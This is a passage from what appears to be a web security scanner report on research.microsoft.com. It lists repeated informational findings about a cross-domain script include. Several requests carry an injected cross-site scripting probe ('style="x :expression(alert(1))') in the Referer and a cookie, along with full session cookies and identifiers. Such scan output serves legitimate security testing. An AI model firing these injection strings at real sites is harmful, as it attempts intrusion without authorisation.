
Request

GET /en-us/collaboration/focus/escience/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.60. http://research.microsoft.com/en-us/collaboration/focus/health/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/focus/health/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/focus/health/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.61. http://research.microsoft.com/en-us/collaboration/focus/nui/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/focus/nui/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/focus/nui/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.62. http://research.microsoft.com/en-us/collaboration/global/asia-pacific/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/asia-pacific/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/global/asia-pacific/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.63. http://research.microsoft.com/en-us/collaboration/global/asia-pacific/talent/awards-asia-pacific.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/asia-pacific/talent/awards-asia-pacific.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/global/asia-pacific/talent/awards-asia-pacific.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.64. http://research.microsoft.com/en-us/collaboration/global/asia-pacific/talent/mstc.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/asia-pacific/talent/mstc.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/global/asia-pacific/talent/mstc.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.65. http://research.microsoft.com/en-us/collaboration/global/europe/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/europe/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/global/europe/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.66. http://research.microsoft.com/en-us/collaboration/global/europe/europe-awards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/europe/europe-awards.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/global/europe/europe-awards.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.67. http://research.microsoft.com/en-us/collaboration/global/india/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/india/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/global/india/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.68. http://research.microsoft.com/en-us/collaboration/global/india/india-awards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/india/india-awards.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/global/india/india-awards.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.69. http://research.microsoft.com/en-us/collaboration/global/india/phdfellowships.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/india/phdfellowships.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/global/india/phdfellowships.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.70. http://research.microsoft.com/en-us/collaboration/global/latam/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/latam/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/global/latam/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.71. http://research.microsoft.com/en-us/collaboration/global/latam/latam-awards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/latam/latam-awards.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/global/latam/latam-awards.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.72. http://research.microsoft.com/en-us/collaboration/global/me-africa/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/me-africa/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/global/me-africa/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.73. http://research.microsoft.com/en-us/collaboration/global/northam/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/northam/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/global/northam/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.74. http://research.microsoft.com/en-us/collaboration/global/northam/northam-awards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/global/northam/northam-awards.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/global/northam/northam-awards.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.75. http://research.microsoft.com/en-us/collaboration/institutes/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/institutes/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/institutes/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.76. http://research.microsoft.com/en-us/collaboration/tools/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/tools/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/tools/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.77. http://research.microsoft.com/en-us/community/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/community/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/community/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.78. http://research.microsoft.com/en-us/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/default.aspx HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/apps/dp/search.aspx?q=27b6a%22style%253d%22x+%253aexpression%28alert%281%29%29+%22d048afd9275&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; s_cc=true; SH=27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7||xss.cx sqli httpi rxss||xss; s_sq=msnportalbetarmc%3D%2526pid%253DMicrosoft%252520Research%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//research.microsoft.com/c/1040%2526ot%253DA

Response

18.79. http://research.microsoft.com/en-us/events/escience2011/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/events/escience2011/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/events/escience2011/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.80. http://research.microsoft.com/en-us/events/indiaschooljune2011/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/events/indiaschooljune2011/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/events/indiaschooljune2011/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.81. http://research.microsoft.com/en-us/events/women-in-computing2011/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/events/women-in-computing2011/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/events/women-in-computing2011/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.82. http://research.microsoft.com/en-us/jobs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/jobs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/jobs/default.aspx HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/apps/dp/gr/groups.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; SH=xss||xss.cx sqli httpi dork ghdb bhdb||27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7; s_cc=true; s_sq=msnportalbetarmc%3D%2526pid%253DGroups%252520-%252520Microsoft%252520Research%2526pidt%253D1%2526oid%253Dhttp%25253A//research.microsoft.com/c/1030%2526ot%253DA

Response

18.83. http://research.microsoft.com/en-us/jobs/fulltime/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/jobs/fulltime/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/jobs/fulltime/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.84. http://research.microsoft.com/en-us/jobs/fulltime/researcher.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/jobs/fulltime/researcher.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/jobs/fulltime/researcher.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.85. http://research.microsoft.com/en-us/jobs/intern/about_asia-pacific.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/jobs/intern/about_asia-pacific.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/jobs/intern/about_asia-pacific.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.86. http://research.microsoft.com/en-us/jobs/intern/about_ca.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/jobs/intern/about_ca.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/jobs/intern/about_ca.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.87. http://research.microsoft.com/en-us/jobs/intern/about_india.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/jobs/intern/about_india.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/jobs/intern/about_india.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.88. http://research.microsoft.com/en-us/jobs/intern/about_uk.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/jobs/intern/about_uk.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/jobs/intern/about_uk.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.89. http://research.microsoft.com/en-us/jobs/intern/about_wa.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/jobs/intern/about_wa.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/jobs/intern/about_wa.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.90. http://research.microsoft.com/en-us/jobs/intern/cmic.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/jobs/intern/cmic.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/jobs/intern/cmic.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.91. http://research.microsoft.com/en-us/jobs/intern/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/jobs/intern/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/jobs/intern/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.92. http://research.microsoft.com/en-us/jobs/intern/russia.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/jobs/intern/russia.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/jobs/intern/russia.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.93. http://research.microsoft.com/en-us/labs/asia/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/asia/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/labs/asia/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.94. http://research.microsoft.com/en-us/labs/cambridge/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/cambridge/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/labs/cambridge/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.95. http://research.microsoft.com/en-us/labs/cmic/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/cmic/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/labs/cmic/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.96. http://research.microsoft.com/en-us/labs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/labs/default.aspx HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/en-us/people/lilich/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; SH=xss||xss.cx sqli httpi dork ghdb bhdb||27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7; s_cc=true; s_sq=msnportalbetarmc%3D%2526pid%253DLili%252520Cheng%252520-%252520Microsoft%252520Research%2526pidt%253D1%2526oid%253Dhttp%25253A//research.microsoft.com/c/1011%2526ot%253DA

Response

18.97. http://research.microsoft.com/en-us/labs/emic/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/emic/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/labs/emic/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

